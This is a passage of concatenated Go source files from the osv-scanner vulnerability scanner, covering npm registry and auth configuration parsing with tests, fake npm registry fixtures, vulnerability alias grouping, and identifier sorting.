found bool if regKey, found = strings.CutSuffix(regKey, "/"); !found { regKey = regKey[:strings.LastIndex(regKey, "/")+1] } } return nil } // urlPathEscapeLower is url.PathEscape but with lowercase letters in hex codes (matching npm's behaviour) // e.g. "@reg/pkg" -> "@reg%2fpkg" func urlPathEscapeLower(s string) string { escaped := url.PathEscape(s) re := cachedregexp.MustCompile(`%[0-9A-F]{2}`) return re.ReplaceAllStringFunc(escaped, strings.ToLower) } type NpmRegistryConfig struct { ScopeURLs map[string]string // map of @scope to registry URL Auths NpmRegistryAuths // auth info per npm registry URI } func LoadNpmRegistryConfig(workdir string) (NpmRegistryConfig, error) { npmrc, err := loadNpmrc(workdir) if err != nil { return NpmRegistryConfig{}, err } return ParseNpmRegistryInfo(npmrc), nil } // MakeRequest makes the http request to the corresponding npm registry api (with auth). // urlComponents should be (package) or (package, version) func (r NpmRegistryConfig) MakeRequest(ctx context.Context, httpClient *http.Client, urlComponents ...string) (*http.Response, error) { if len(urlComponents) == 0 { return nil, errors.New("no package specified in npm request") } // find the corresponding registryInfo for the package's scope pkg := urlComponents[0] scope := "" if strings.HasPrefix(pkg, "@") { scope, _, _ = strings.Cut(pkg, "/") } baseURL, ok := r.ScopeURLs[scope] if !ok { // no specific rules for this scope, use the default scope baseURL = r.ScopeURLs[""] } for i := range urlComponents { urlComponents[i] = urlPathEscapeLower(urlComponents[i]) } reqURL, err := url.JoinPath(baseURL, urlComponents...) if err != nil { return nil, err } return r.Auths.GetAuth(reqURL).Get(ctx, httpClient, reqURL) } var npmSupportedAuths = []HTTPAuthMethod{AuthBearer, AuthBasic} func ParseNpmRegistryInfo(npmrc NpmrcConfig) NpmRegistryConfig { config := NpmRegistryConfig{ ScopeURLs: map[string]string{"": "https://registry.npmjs.org/"}, // set the default registry Auths: make(map[string]*HTTPAuthentication), } getOrInitAuth := func(key string) *HTTPAuthentication { if auth, ok := config.Auths[key]; ok { return auth } auth := &HTTPAuthentication{ SupportedMethods: npmSupportedAuths, AlwaysAuth: true, } config.Auths[key] = auth return auth } for name, value := range npmrc { var part1, part2 string // must split on the last ':' in case e.g. '//localhost:8080/:_auth=xyz' if idx := strings.LastIndex(name, ":"); idx >= 0 { part1, part2 = name[:idx], name[idx+1:] } value := os.ExpandEnv(value) // TODO: npm config replaces only ${VAR}, not $VAR // and if VAR is unset, it will leave the string as "${VAR}" switch { case name == "registry": // registry=... config.ScopeURLs[""] = value case part2 == "registry": // @scope:registry=... config.ScopeURLs[part1] = value case part2 == "_authToken": // //uri:_authToken=... getOrInitAuth(part1).BearerToken = value case part2 == "_auth": // //uri:_auth=... getOrInitAuth(part1).BasicAuth = value case part2 == "username": // //uri:username=... getOrInitAuth(part1).Username = value case part2 == "_password": // //uri:_password= password, err := base64.StdEncoding.DecodeString(value) if err != nil { // TODO: mimic the behaviour of node's Buffer.from(s, 'base64').toString() // e.g. ignore invalid characters, stop parsing after first '=', just never throw an error break } getOrInitAuth(part1).Password = string(password) } } return config } ================================================ FILE: internal/datasource/npmrc_test.go ================================================ package datasource_test import ( "encoding/base64" "fmt" "net/http" "os" "path/filepath" "testing" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/testutility" ) // These tests rely on using 'globalconfig' and 'userconfig' in the package .npmrc to override their default locations. // It's also possible for environment variables or the builtin npmrc to mess with these tests. // TODO: Should test the default and other methods of setting the global/user config. func createTempNpmrc(t *testing.T, filename string) string { t.Helper() dir := testutility.CreateTestDir(t) file := filepath.Join(dir, filename) f, err := os.Create(file) if err != nil { t.Fatalf("could not create test npmrc file: %v", err) } f.Close() return file } func writeToNpmrc(t *testing.T, file string, lines ...string) { t.Helper() f, err := os.OpenFile(file, os.O_APPEND|os.O_WRONLY, 0666) if err != nil { t.Fatalf("could not write to test npmrc file: %v", err) } defer f.Close() for _, line := range lines { if _, err := fmt.Fprintln(f, line); err != nil { t.Fatalf("could not write to test npmrc file: %v", err) } } } type testNpmrcFiles struct { global string user string project string } func makeBlankNpmrcFiles(t *testing.T) testNpmrcFiles { t.Helper() var files testNpmrcFiles files.global = createTempNpmrc(t, "npmrc") files.user = createTempNpmrc(t, ".npmrc") files.project = createTempNpmrc(t, ".npmrc") writeToNpmrc(t, files.project, "globalconfig="+files.global, "userconfig="+files.user) return files } func checkNpmRegistryRequest(t *testing.T, config datasource.NpmRegistryConfig, urlComponents []string, wantURL string, wantAuth string) { t.Helper() mt := &mockTransport{} httpClient := &http.Client{Transport: mt} resp, err := config.MakeRequest(t.Context(), httpClient, urlComponents...) if err != nil { t.Fatalf("error making request: %v", err) } defer resp.Body.Close() if len(mt.Requests) != 1 { t.Fatalf("unexpected number of requests made: %v", len(mt.Requests)) } req := mt.Requests[0] gotURL := req.URL.String() if gotURL != wantURL { t.Errorf("MakeRequest() URL was %s, want %s", gotURL, wantURL) } gotAuth := req.Header.Get("Authorization") if gotAuth != wantAuth { t.Errorf("MakeRequest() Authorization was \"%s\", want \"%s\"", gotAuth, wantAuth) } } func TestLoadNpmRegistryConfig_WithNoRegistries(t *testing.T) { t.Parallel() npmrcFiles := makeBlankNpmrcFiles(t) config, err := datasource.LoadNpmRegistryConfig(filepath.Dir(npmrcFiles.project)) if err != nil { t.Fatalf("could not parse npmrc: %v", err) } if nRegs := len(config.ScopeURLs); nRegs != 1 { t.Errorf("expected 1 npm registry, got %v", nRegs) } checkNpmRegistryRequest(t, config, []string{"@test/package", "1.2.3"}, "https://registry.npmjs.org/@test%2fpackage/1.2.3", "") } func TestLoadNpmRegistryConfig_WithAuth(t *testing.T) { t.Parallel() npmrcFiles := makeBlankNpmrcFiles(t) writeToNpmrc(t, npmrcFiles.project, "registry=https://registry1.test.com", "//registry1.test.com/:_auth=bXVjaDphdXRoCg==", "@test1:registry=https://registry2.test.com", "//registry2.test.com/:_authToken=c3VjaCB0b2tlbgo=", "@test2:registry=https://sub.registry2.test.com", "//sub.registry2.test.com:username=user", "//sub.registry2.test.com:_password=d293Cg==", ) config, err := datasource.LoadNpmRegistryConfig(filepath.Dir(npmrcFiles.project)) if err != nil { t.Fatalf("could not parse npmrc: %v", err) } checkNpmRegistryRequest(t, config, []string{"foo"}, "https://registry1.test.com/foo", "Basic bXVjaDphdXRoCg==") checkNpmRegistryRequest(t, config, []string{"@test0/bar"}, "https://registry1.test.com/@test0%2fbar", "Basic bXVjaDphdXRoCg==") checkNpmRegistryRequest(t, config, []string{"@test1/baz"}, "https://registry2.test.com/@test1%2fbaz", "Bearer c3VjaCB0b2tlbgo=") checkNpmRegistryRequest(t, config, []string{"@test2/test"}, "https://sub.registry2.test.com/@test2%2ftest", "Basic dXNlcjp3b3cK") } // Do not make this test parallel because it calls t.Setenv() func TestLoadNpmRegistryConfig_WithOverrides(t *testing.T) { check := func(t *testing.T, npmrcFiles testNpmrcFiles, wantURLs [5]string) { t.Helper() config, err := datasource.LoadNpmRegistryConfig(filepath.Dir(npmrcFiles.project)) if err != nil { t.Fatalf("could not parse npmrc: %v", err) } checkNpmRegistryRequest(t, config, []string{"pkg"}, wantURLs[0], "") checkNpmRegistryRequest(t, config, []string{"@general/pkg"}, wantURLs[1], "") checkNpmRegistryRequest(t, config, []string{"@global/pkg"}, wantURLs[2], "") checkNpmRegistryRequest(t, config, []string{"@user/pkg"}, wantURLs[3], "") checkNpmRegistryRequest(t, config, []string{"@project/pkg"}, wantURLs[4], "") } npmrcFiles := makeBlankNpmrcFiles(t) writeToNpmrc(t, npmrcFiles.project, "@project:registry=https://project.registry.com") writeToNpmrc(t, npmrcFiles.user, "@user:registry=https://user.registry.com") writeToNpmrc(t, npmrcFiles.global, "@global:registry=https://global.registry.com", "@general:registry=https://general.global.registry.com", "registry=https://global.registry.com", ) wantURLs := [5]string{ "https://global.registry.com/pkg", "https://general.global.registry.com/@general%2fpkg", "https://global.registry.com/@global%2fpkg", "https://user.registry.com/@user%2fpkg", "https://project.registry.com/@project%2fpkg", } check(t, npmrcFiles, wantURLs) // override global in user writeToNpmrc(t, npmrcFiles.user, "@general:registry=https://general.user.registry.com", "registry=https://user.registry.com", ) wantURLs[0] = "https://user.registry.com/pkg" wantURLs[1] = "https://general.user.registry.com/@general%2fpkg" check(t, npmrcFiles, wantURLs) // override global/user in project writeToNpmrc(t, npmrcFiles.project, "@general:registry=https://general.project.registry.com", "registry=https://project.registry.com", ) wantURLs[0] = "https://project.registry.com/pkg" wantURLs[1] = "https://general.project.registry.com/@general%2fpkg" check(t, npmrcFiles, wantURLs) // override global/user/project in environment variable t.Setenv("NPM_CONFIG_REGISTRY", "https://environ.registry.com") wantURLs[0] = "https://environ.registry.com/pkg" check(t, npmrcFiles, wantURLs) } func TestNpmRegistryAuths(t *testing.T) { t.Parallel() b64enc := func(s string) string { t.Helper() return base64.StdEncoding.EncodeToString([]byte(s)) } tests := []struct { name string config datasource.NpmrcConfig requestURL string wantAuth string }{ // Auth tests adapted from npm-registry-fetch // https://github.com/npm/npm-registry-fetch/blob/237d33b45396caa00add61e0549cf09fbf9deb4f/test/auth.js { name: "basic_auth", config: datasource.NpmrcConfig{ "//my.custom.registry/here/:username": "user", "//my.custom.registry/here/:_password": b64enc("pass"), }, requestURL: "https://my.custom.registry/here/", wantAuth: "Basic " + b64enc("user:pass"), }, { name: "token_auth", config: datasource.NpmrcConfig{ "//my.custom.registry/here/:_authToken": "c0ffee", "//my.custom.registry/here/:token": "nope", "//my.custom.registry/:_authToken": "7ea", "//my.custom.registry/:token": "nope", }, requestURL: "https://my.custom.registry/here//foo/-/foo.tgz", wantAuth: "Bearer c0ffee", }, { name: "_auth_auth", config: datasource.NpmrcConfig{ "//my.custom.registry/:_auth": "decafbad", "//my.custom.registry/here/:_auth": "c0ffee", }, requestURL: "https://my.custom.registry/here//asdf/foo/bard/baz", wantAuth: "Basic c0ffee", }, { name: "_auth_username:pass_auth", config: datasource.NpmrcConfig{ "//my.custom.registry/here/:_auth": b64enc("foo:bar"), }, requestURL: "https://my.custom.registry/here/", wantAuth: "Basic " + b64enc("foo:bar"), }, { name: "ignore_user/pass_when__auth_is_set", config: datasource.NpmrcConfig{ "//registry/:_auth": b64enc("not:foobar"), "//registry/:username": "foo", "//registry/:_password": b64enc("bar"), }, requestURL: "http://registry/pkg/-/pkg-1.2.3.tgz", wantAuth: "Basic " + b64enc("not:foobar"), }, { name: "different_hosts_for_uri_vs_registry", config: datasource.NpmrcConfig{ "//my.custom.registry/here/:_authToken": "c0ffee", "//my.custom.registry/here/:token": "nope", }, requestURL: "https://some.other.host/", wantAuth: "", }, { name: "do_not_be_thrown_by_other_weird_configs", config: datasource.NpmrcConfig{ "@asdf:_authToken": "does this work?", "//registry.npmjs.org:_authToken": "do not share this", "_authToken": "definitely do not share this, either", "//localhost:15443:_authToken": "wrong", "//localhost:15443/foo:_authToken": "correct bearer token", "//localhost:_authToken": "not this one", "//other-registry:_authToken": "this should not be used", "@asdf:registry": "https://other-registry/", }, requestURL: "http://localhost:15443/foo/@asdf/bar/-/bar-1.2.3.tgz", wantAuth: "Bearer correct bearer token", }, // Some extra tests, based on experimentation with npm config { name: "exact_package_path_uri", config: datasource.NpmrcConfig{ "//custom.registry/:_authToken": "less specific match", "//custom.registry/package:_authToken": "exact match", "//custom.registry/package/:_authToken": "no match trailing slash", }, requestURL: "http://custom.registry/package", wantAuth: "Bearer exact match", }, { name: "percent-encoding_case-sensitivity", config: datasource.NpmrcConfig{ "//custom.registry/:_authToken": "expected", "//custom.registry/@scope%2Fpackage:_authToken": "bad config", }, requestURL: "http://custom.registry/@scope%2fpackage", wantAuth: "Bearer expected", }, { name: "require_both_user_and_pass", config: datasource.NpmrcConfig{ "//custom.registry/:_authToken": "fallback", "//custom.registry/foo:username": "user", }, requestURL: "https://custom.registry/foo/bar", wantAuth: "Bearer fallback", }, { name: "don't_inherit_username", config: datasource.NpmrcConfig{ "//custom.registry/:_authToken": "fallback", "//custom.registry/foo:username": "user", "//custom.registry/foo/bar:_password": b64enc("pass"), }, requestURL: "https://custom.registry/foo/bar/baz", wantAuth: "Bearer fallback", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() config := datasource.ParseNpmRegistryInfo(tt.config) // Send off requests to mockTransport to see the auth headers being added. mt := &mockTransport{} httpClient := &http.Client{Transport: mt} resp, err := config.Auths.GetAuth(tt.requestURL).Get(t.Context(), httpClient, tt.requestURL) if err != nil { t.Fatalf("error making request: %v", err) } defer resp.Body.Close() if len(mt.Requests) != 1 { t.Fatalf("unexpected number of requests made: %v", len(mt.Requests)) } header := mt.Requests[0].Header if got := header.Get("Authorization"); got != tt.wantAuth { t.Errorf("authorization header got = \"%s\", want \"%s\"", got, tt.wantAuth) } }) } } ================================================ FILE: internal/datasource/testdata/maven_settings/settings.xml ================================================ server1 user pass server2 ${env.MAVEN_SETTINGS_TEST_USR} ~~${env.MAVEN_SETTINGS_TEST_PWD}~~ ${env.MAVEN_SETTINGS_TEST_SID} ${env.maven_settings_test_usr}-${env.MAVEN_SETTINGS_TEST_NIL} ${env.MAVEN_SETTINGS_TEST_BAD} ================================================ FILE: internal/datasource/testdata/npm_registry/@fake-registry-a.json ================================================ { "name": "@fake-registry/a", "versions": { "1.2.3": { "name": "@fake-registry/a", "version": "1.2.3", "description": "package a", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": { "name": "a author" }, "license": "ISC", "optionalDependencies": { "@fake-registry/b": "^1.0.0", "@fake-registry/e": "^1.0.0" }, "dependencies": { "@fake-registry/b": "^1.0.0", "@fake-registry/e": "^1.0.0" }, "_id": "@fake-registry/a@1.2.3", "_nodeVersion": "10.24.1", "_npmVersion": "7.24.2", "dist": { "integrity": "sha512-vIimlnWl8mXXUvJkdeF2KsTIz/3AN3T6Xn7mz0e9w4a0OmVPGJG7M0jL63GkvNYJrvFHLcapfsNksZ/QNKRGhg==", "shasum": "f74ccf91104999d9240c9ea019c6c7872a0429fb", "tarball": "http://localhost:4873/@fake-registry%2fa/-/a-1.2.3.tgz" }, "contributors": [] }, "2.3.4": { "name": "@fake-registry/a", "version": "2.3.4", "description": "package a@2", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": { "name": "a@2 author" }, "license": "MIT", "dependencies": { "@fake-registry/b": "^2.0.0" }, "_id": "@fake-registry/a@2.3.4", "_nodeVersion": "10.24.1", "_npmVersion": "7.24.2", "dist": { "integrity": "sha512-Q1N2Ke+K6e4Vr20qHsjCPMzin4zKNxoo1qkN0MngiZKjNt7UfChaPi7zCtQtrWgH21j9WWR3/J0roepjJJp0iQ==", "shasum": "cdc054c44494751f50508032d557ab7b7fc78703", "tarball": "http://localhost:4873/@fake-registry%2fa/-/a-2.3.4.tgz" }, "contributors": [] } }, "time": { "modified": "2024-03-11T03:25:10.926Z", "created": "2024-03-11T03:25:06.832Z", "1.2.3": "2024-03-11T03:25:06.832Z", "2.3.4": "2024-03-11T03:25:10.926Z" }, "users": {}, "dist-tags": { "latest": "2.3.4" }, "_rev": "6-92a4e77dfe57d1a3", "_id": "@fake-registry/a", "readme": "ERROR: No README data found!", "_attachments": {} } ================================================ FILE: internal/datasource/testdata/npm_registry/fake-package-2.2.2.json ================================================ { "name": "fake-package", "version": "2.2.2", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "a": "^3.0.1", "b": "^2.0.1", "e": "^0.2.33", "f": "npm:g@^2.0.1" }, "devDependencies": { "c": "^1.1.1", "d": "^1.0.2" }, "optionalDependencies": { "e": "^0.2.33", "f": "npm:g@^2.0.1" }, "peerDependencies": { "h": "^1.0.0" }, "bundleDependencies": [ "a" ], "_id": "fake-package@2.2.2", "_nodeVersion": "20.9.0", "_npmVersion": "10.1.0", "dist": { "integrity": "sha512-NWvNE9fxykrzSQVr1CSKchzkQr5qwplvgn3O/0JL46qM6BhoGlKRjLiaZYdo1byXJWLGthghOgGpUZiEL04HQQ==", "shasum": "8dc47515da4e67bb794a4c9c7f4750bb4d67c7fc", "tarball": "http://localhost:4873/fake-package/-/fake-package-2.2.2.tgz" }, "contributors": [] } ================================================ FILE: internal/datasource/testdata/npm_registry/fake-package.json ================================================ { "name": "fake-package", "versions": { "1.0.0": { "name": "fake-package", "version": "1.0.0", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "_id": "fake-package@1.0.0", "_nodeVersion": "20.9.0", "_npmVersion": "10.1.0", "dist": { "integrity": "sha512-leL6CT1Ld/eHfO5bYq0NQRKBh0fu0WyKGMbZ/IA/wcfDlZpA+5NBARcCciGmswKgdIk/zD+7uRQ8366YwVuoEg==", "shasum": "0d2ff81ce4e33cbb95d45c8ee394c5f90398cf2e", "tarball": "http://localhost:4873/fake-package/-/fake-package-1.0.0.tgz" }, "contributors": [] }, "2.2.2": { "name": "fake-package", "version": "2.2.2", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "a": "^3.0.1", "b": "^2.0.1", "e": "^0.2.33", "f": "npm:g@^2.0.1" }, "devDependencies": { "c": "^1.1.1", "d": "^1.0.2" }, "optionalDependencies": { "e": "^0.2.33", "f": "npm:g@^2.0.1" }, "peerDependencies": { "h": "^1.0.0" }, "bundleDependencies": [ "a" ], "_id": "fake-package@2.2.2", "_nodeVersion": "20.9.0", "_npmVersion": "10.1.0", "dist": { "integrity": "sha512-NWvNE9fxykrzSQVr1CSKchzkQr5qwplvgn3O/0JL46qM6BhoGlKRjLiaZYdo1byXJWLGthghOgGpUZiEL04HQQ==", "shasum": "8dc47515da4e67bb794a4c9c7f4750bb4d67c7fc", "tarball": "http://localhost:4873/fake-package/-/fake-package-2.2.2.tgz" }, "contributors": [] } }, "time": { "modified": "2024-03-20T04:11:53.692Z", "created": "2024-03-20T04:03:14.913Z", "1.0.0": "2024-03-20T04:03:14.913Z", "2.2.2": "2024-03-20T04:11:53.692Z" }, "users": {}, "dist-tags": { "latest": "1.0.0", "version1": "1.0.0", "version2": "2.2.2" }, "_rev": "6-08472a5a07b7c076", "_id": "fake-package", "readme": "ERROR: No README data found!", "_attachments": {} } ================================================ FILE: internal/depsdev/depsdev.go ================================================ // Package depsdev contains constants and mappings for the deps.dev API. package depsdev import ( "github.com/ossf/osv-schema/bindings/go/osvconstants" depsdevpb "deps.dev/api/v3" ) // DepsdevAPI is the URL to the deps.dev API. It is documented at // docs.deps.dev/api. const DepsdevAPI = "api.deps.dev:443" // System maps from a lockfile system to the depsdev API system. var System = map[osvconstants.Ecosystem]depsdevpb.System{ osvconstants.EcosystemNPM: depsdevpb.System_NPM, osvconstants.EcosystemNuGet: depsdevpb.System_NUGET, osvconstants.EcosystemCratesIO: depsdevpb.System_CARGO, osvconstants.EcosystemGo: depsdevpb.System_GO, osvconstants.EcosystemMaven: depsdevpb.System_MAVEN, osvconstants.EcosystemPyPI: depsdevpb.System_PYPI, osvconstants.EcosystemRubyGems: depsdevpb.System_RUBYGEMS, } ================================================ FILE: internal/grouper/grouper.go ================================================ // Package grouper groups vulnerabilities by aliases, then sorts them. package grouper import ( "maps" "slices" "sort" "github.com/google/osv-scanner/v2/internal/identifiers" "github.com/google/osv-scanner/v2/pkg/models" ) func hasAliasIntersection(v1, v2 IDAliases) bool { // Check if any aliases intersect. for _, alias := range v1.Aliases { if slices.Contains(v2.Aliases, alias) { return true } } // Check if either IDs are in the others' aliases. return slices.Contains(v1.Aliases, v2.ID) || slices.Contains(v2.Aliases, v1.ID) } // Group groups vulnerabilities by aliases. func Group(vulns []IDAliases) []models.GroupInfo { // Mapping of `vulns` index to a group ID. A group ID is just another index in the `vulns` slice. groups := make([]int, len(vulns)) // Initially make every vulnerability its own group. for i := range vulns { groups[i] = i } // Do a pair-wise (n^2) comparison and merge all intersecting vulns. for i := range vulns { for j := i + 1; j < len(vulns); j++ { if hasAliasIntersection(vulns[i], vulns[j]) { // Merge the two groups. Use the smaller index as the representative ID. groups[i] = min(groups[i], groups[j]) groups[j] = groups[i] } } } // Extract groups into the final result structure. extractedGroups := map[int][]string{} extractedAliases := map[int][]string{} for i, gid := range groups { extractedGroups[gid] = append(extractedGroups[gid], vulns[i].ID) extractedAliases[gid] = append(extractedAliases[gid], vulns[i].Aliases...) } // Sort by group ID to maintain stable order for tests. sortedKeys := slices.AppendSeq(make([]int, 0, len(extractedGroups)), maps.Keys(extractedGroups)) sort.Ints(sortedKeys) result := make([]models.GroupInfo, 0, len(sortedKeys)) for _, key := range sortedKeys { // Sort the strings so they are always in the same order slices.SortFunc(extractedGroups[key], identifiers.IDSortFunc) // Add IDs to aliases extractedAliases[key] = append(extractedAliases[key], extractedGroups[key]...) // Dedup entries sort.Strings(extractedAliases[key]) extractedAliases[key] = slices.Compact(extractedAliases[key]) result = append(result, models.GroupInfo{IDs: extractedGroups[key], Aliases: extractedAliases[key]}) } return result } ================================================ FILE: internal/grouper/grouper_models.go ================================================ package grouper import ( "slices" "strings" "github.com/google/osv-scanner/v2/internal/identifiers" "github.com/ossf/osv-schema/bindings/go/osvschema" ) type IDAliases struct { ID string Aliases []string } func ConvertVulnerabilityToIDAliases(c []*osvschema.Vulnerability) []IDAliases { output := make([]IDAliases, 0, len(c)) slices.SortFunc(c, identifiers.MostUpstreamsOrder) for _, v := range c { idAliases := IDAliases{ ID: v.GetId(), Aliases: v.GetAliases(), } idAliases.Aliases = append(idAliases.Aliases, v.GetUpstream()...) // For Ubuntu Security Advisory data, // all related CVEs should be bundled together, as they are part of this USN. // TODO(jesslowe): remove after all USNs are migrated. if strings.Split(v.GetId(), "-")[0] == "USN" { idAliases.Aliases = append(idAliases.Aliases, v.GetRelated()...) } output = append(output, idAliases) } return output } ================================================ FILE: internal/grouper/grouper_test.go ================================================ package grouper_test import ( "testing" "github.com/google/go-cmp/cmp" "github.com/google/osv-scanner/v2/internal/grouper" "github.com/google/osv-scanner/v2/pkg/models" ) func TestGroup(t *testing.T) { t.Parallel() // Should be grouped by IDs appearing in alias. v1 := grouper.IDAliases{ ID: "CVE-1", Aliases: []string{ "FOO-1", }, } v2 := grouper.IDAliases{ ID: "FOO-1", Aliases: []string{}, } v3 := grouper.IDAliases{ ID: "FOO-2", Aliases: []string{ "FOO-1", }, } // Should be grouped by aliases intersecting. v4 := grouper.IDAliases{ ID: "BAR-1", Aliases: []string{ "CVE-2", "CVE-3", }, } v5 := grouper.IDAliases{ ID: "BAR-2", Aliases: []string{ "CVE-3", "CVE-4", }, } v6 := grouper.IDAliases{ ID: "BAR-3", Aliases: []string{ "CVE-4", }, } // Unrelated. v7 := grouper.IDAliases{ ID: "UNRELATED-1", Aliases: []string{ "BAR-1337", }, } v8 := grouper.IDAliases{ ID: "UNRELATED-2", Aliases: []string{ "BAR-1338", }, } // Unrelated, empty aliases v9 := grouper.IDAliases{ ID: "UNRELATED-3", } v10 := grouper.IDAliases{ ID: "UNRELATED-4", } for _, tc := range []struct { vulns []grouper.IDAliases want []models.GroupInfo }{ { vulns: []grouper.IDAliases{ v1, v2, v3, v4, v5, v6, v7, v8, }, want: []models.GroupInfo{ { IDs: []string{v1.ID, v2.ID, v3.ID}, Aliases: []string{v1.ID, v2.ID, v3.ID}, }, { IDs: []string{v4.ID, v5.ID, v6.ID}, Aliases: []string{v4.ID, v5.ID, v6.ID, v4.Aliases[0], v4.Aliases[1], v5.Aliases[1]}, }, { IDs: []string{v7.ID}, Aliases: []string{v7.Aliases[0], v7.ID}, }, { IDs: []string{v8.ID}, Aliases: []string{v8.Aliases[0], v8.ID}, }, }, }, { vulns: []grouper.IDAliases{ v8, v2, v1, v5, v7, v4, v6, v3, v9, v10, }, want: []models.GroupInfo{ { IDs: []string{v8.ID}, Aliases: []string{v8.Aliases[0], v8.ID}, }, { IDs: []string{v1.ID, v2.ID, v3.ID}, // Deterministic order Aliases: []string{v1.ID, v2.ID, v3.ID}, // Deterministic order }, { IDs: []string{v4.ID, v5.ID, v6.ID}, Aliases: []string{v4.ID, v5.ID, v6.ID, v4.Aliases[0], v4.Aliases[1], v5.Aliases[1]}, }, { IDs: []string{v7.ID}, Aliases: []string{v7.Aliases[0], v7.ID}, }, { IDs: []string{v9.ID}, Aliases: []string{v9.ID}, }, { IDs: []string{v10.ID}, Aliases: []string{v10.ID}, }, }, }, { vulns: []grouper.IDAliases{ v9, v10, }, want: []models.GroupInfo{ { IDs: []string{v9.ID}, Aliases: []string{v9.ID}, }, { IDs: []string{v10.ID}, Aliases: []string{v10.ID}, }, }, }, } { grouped := grouper.Group(tc.vulns) if diff := cmp.Diff(tc.want, grouped); diff != "" { t.Errorf("GroupedVulns() returned an unexpected result (-want +got):\n%s", diff) } } } ================================================ FILE: internal/identifiers/identifiers.go ================================================ // Package identifiers provides functions for sorting vulnerability identifiers. package identifiers import ( "strings" "github.com/ossf/osv-schema/bindings/go/osvschema" ) // MostUpstreamsOrder orders by which vuln has the most upstreams, // thereby finding the furthest downstream vuln identifier. func MostUpstreamsOrder(a, b *osvschema.Vulnerability) int { if len(a.GetUpstream()) > len(b.GetUpstream()) { return -1 } else if len(a.GetUpstream()) < len(b.GetUpstream()) { return 1 } return IDSortFunc(a.GetId(), b.GetId()) } func prefixOrder(prefix string) int { switch prefix { case "DSA", "USN": // Special case: For container scanning, DSA contains multiple CVEs and is more accurate. return 3 case "CVE": // Highest precedence for normal cases return 2 case "GHSA": // Lowest precedence return 0 } return 1 } func prefixOrderForDescription(prefix string) int { switch prefix { case "CVE": return 0 case "GHSA": return 1 } return 2 } func idSort(a, b string, prefixOrd func(string) int) int { prefixAOrd := prefixOrd(strings.Split(a, "-")[0]) prefixBOrd := prefixOrd(strings.Split(b, "-")[0]) if prefixAOrd > prefixBOrd { return -1 } else if prefixAOrd < prefixBOrd { return 1 } return strings.Compare(a, b) } // IDSortFunc sorts IDs ascending by CVE < [ECO-SPECIFIC] < GHSA func IDSortFunc(a, b string) int { return idSort(a, b, prefixOrder) } // IDSortFuncForDescription sorts ID ascending by [ECO-SPECIFIC] < GHSA < CVE func IDSortFuncForDescription(a, b string) int { return idSort(a, b, prefixOrderForDescription) } ================================================ FILE: internal/identifiers/identifiers_test.go ================================================ package identifiers import ( "slices" "testing" ) func Test_idSortFunc(t *testing.T) { t.Parallel() type args struct { a string b string } tests := []struct { name string args args want int }{ { args: args{ a: "CVE-2012-1234", b: "ANYTHING-2012-1234", }, want: -1, }, { args: args{ a: "GHSA-2012-1234", b: "ANYTHING-2012-1234", }, want: 1, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() if got := IDSortFunc(tt.args.a, tt.args.b); got != tt.want { t.Errorf("idSortFunc() = %v, want %v", got, tt.want) } }) } } func Test_idSortFuncUsage(t *testing.T) { t.Parallel() tests := []struct { name string args []string want string }{ { args: []string{ "CVE-2012-1234", "ANYTHING-2012-1234", }, want: "CVE-2012-1234", }, { args: []string{ "GHSA-2012-1234", "RUSTSEC-2012-1234", }, want: "RUSTSEC-2012-1234", }, { args: []string{ "CVE-2012-1234", "DSA-2012-1234", }, want: "DSA-2012-1234", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() if got := slices.MinFunc(tt.args, IDSortFunc); got != tt.want { t.Errorf("slices.MinFunc = %v, want %v", got, tt.want) } }) } } ================================================ FILE: internal/imodels/imodels.go ================================================ // Package imodels defines internal models for osv-scanner. package imodels import ( "fmt" "strings" "sync" "github.com/google/osv-scalibr/converter" "github.com/google/osv-scalibr/extractor" archivemetadata "github.com/google/osv-scalibr/extractor/filesystem/language/java/archive/metadata" apkmetadata "github.com/google/osv-scalibr/extractor/filesystem/os/apk/metadata" dpkgmetadata "github.com/google/osv-scalibr/extractor/filesystem/os/dpkg/metadata" rpmmetadata "github.com/google/osv-scalibr/extractor/filesystem/os/rpm/metadata" "github.com/google/osv-scalibr/inventory/osvecosystem" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/osv/osvscannerjson" "github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitrepo" "github.com/google/osv-scanner/v2/internal/scalibrplugin" "github.com/google/osv-scanner/v2/internal/utility/purl" "github.com/google/osv-scanner/v2/internal/utility/semverlike" scalibrosv "github.com/google/osv-scalibr/extractor/filesystem/osv" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvconstants" ) var gitExtractors = map[string]struct{}{ gitrepo.Name: {}, } // todo: SBOM special case, to be removed after PURL to ESI conversion within each extractor is complete var cache = sync.Map{} // map[*extractor.Package]*models.PackageInfo func toCachedPackageInfo(pkg *extractor.Package) *models.PackageInfo { if SourceType(pkg) != models.SourceTypeSBOM { return nil } v, ok := cache.Load(pkg) if !ok { purlStruct := converter.ToPURL(pkg) if purlStruct == nil { return nil } purlCache, _ := purl.ToPackage(purlStruct.String()) cache.Store(pkg, &purlCache) return &purlCache } if v == nil { return nil } return v.(*models.PackageInfo) } func Name(pkg *extractor.Package) string { // TODO(v2): SBOM special case, to be removed after PURL to ESI conversion within each extractor is complete if purlCache := toCachedPackageInfo(pkg); purlCache != nil { return purlCache.Name } // --- Make specific patches to names as necessary --- // Patch Go package to stdlib if Ecosystem(pkg).Ecosystem == osvconstants.EcosystemGo && pkg.Name == "go" { return "stdlib" } // TODO: Move the normalization to another where matching logic happens. // Patch python package names to be normalized if Ecosystem(pkg).Ecosystem == osvconstants.EcosystemPyPI { // per https://peps.python.org/pep-0503/#normalized-names return strings.ToLower(cachedregexp.MustCompile(`[-_.]+`).ReplaceAllLiteralString(pkg.Name, "-")) } // Patch Maven archive extractor package names if metadata, 